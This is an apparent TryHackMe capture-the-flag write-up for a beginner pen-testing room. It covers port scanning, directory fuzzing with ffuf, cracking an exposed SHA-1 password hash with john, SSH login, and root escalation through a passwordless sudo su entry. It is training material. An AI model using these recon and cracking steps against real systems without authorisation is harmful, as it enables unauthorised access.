Skip to content

Latest commit

 

History

History
144 lines (102 loc) · 5.46 KB

ckticnjil015j5fs1ecvc2qw4.md

File metadata and controls

144 lines (102 loc) · 5.46 KB
Raw

THM: Crash Course Pen Testing

Basic Information

#
Type Regular Box
Name Try Hack Me / CC: Pen Testing
URLs https://tryhackme.com/room/ccpentesting
Author Asentinn / OkabeRintaro
https://ctftime.org/team/152207

%%[bmac-button]

Contents

  1. Basic Information
  2. Recon
  3. Cracking user password
  4. Elevating privileges
  5. Additional readings

🔔 CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or 🎁 become a Patron which also gives you some bonus perks.
Join our Discord Server!

Recon

Target IP is 10.10.113.202 - I'm assigning that to the variable for ease of use.

$ IP=10.10.113.202

Scanning for open ports

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out

2021-08-31-20-40-46.png

And prepare input for the searchsploit

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-10.10.113.202.xml

2021-08-31-20-45-31.png

Firing up nikto and fuff for practice

$ nikto -h $IP -o nikto-$IP.txt

2021-08-31-22-00-38.png

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md

ffuf command can be a little complicated, so let me explain it a bit

  • -w: wordlist for fuzzing
  • -u: target URL
  • -recursion, -recursion-depth: when fuff finds a directory, it starts another scan after the current finished (you will recognize it by Job [1/X] label)
  • -e: useful one, simultaneously tries to look for files with listed extensions - be careful with this one though, as it multiplies the amount of work by N where N is a number of extensions (because for each wordlist entry it tries appending these extensions).
  • -v: shows full URL of the findings (useful when using -recursion flag)
  • -of: output format, ffuf output files are not the easiest one to read, but and I choose the Markdown for now
  • -o: and this is just a name for the output file; $IP will resolve variable name and the result

2021-08-31-22-00-00.png

Back to top

Cracking user password

Both find out the /secret/ directory and fuff further tracked the /secret/secret.txt.

$ curl http://10.10.200.35/secret/secret.txt

2021-08-31-22-02-54.png

Which definitely is the hash of user password. I will be using john to crack it, and it could be run blindly on that file, but lets use the hash-identifier that comes with Kali to see the output just out of curiosity.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8

2021-08-31-22-03-55.png

As we can see it is the SHA-1 hash. Now cracking it with john:

$ john -format=Raw-SHA1 secret.txt

2021-08-31-22-06-59.png

Which was really fast (don't ever use such weak passwords, of course). So we've got credentials nyan/nyan. Try logging with these on the SSH.

$ ssh nyan@$IP

2021-08-31-22-07-53.png

Were in. I'm getting the user flag.

nyan@ubuntu:~$ cat user.txt

Back to top

Elevating privileges

2021-08-31-22-10-29.png

User nyan can run /bin/su as a root without specifying its password

And just by seeing this sudoer entry we know that nyan is a can execute sudo command.

Otherwise when running sudo -l we would see Sorry, user nyan may not run sudo on ubuntu (where ubuntu is the host name)

We got the root! So cat out that flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt

Additional readings

📌 Follow the #CyberEthical hashtag on the social media
🎁 Become a Patron and gain additional benefits
👾 Join CyberEthical Discord server
👉 Instagram: @cyber.ethical.me
👉 LinkedIn: Kamil Gierach-Pacanek
👉 Twitter: @cyberethical_me
👉 Facebook: @CyberEthicalMe

Back to top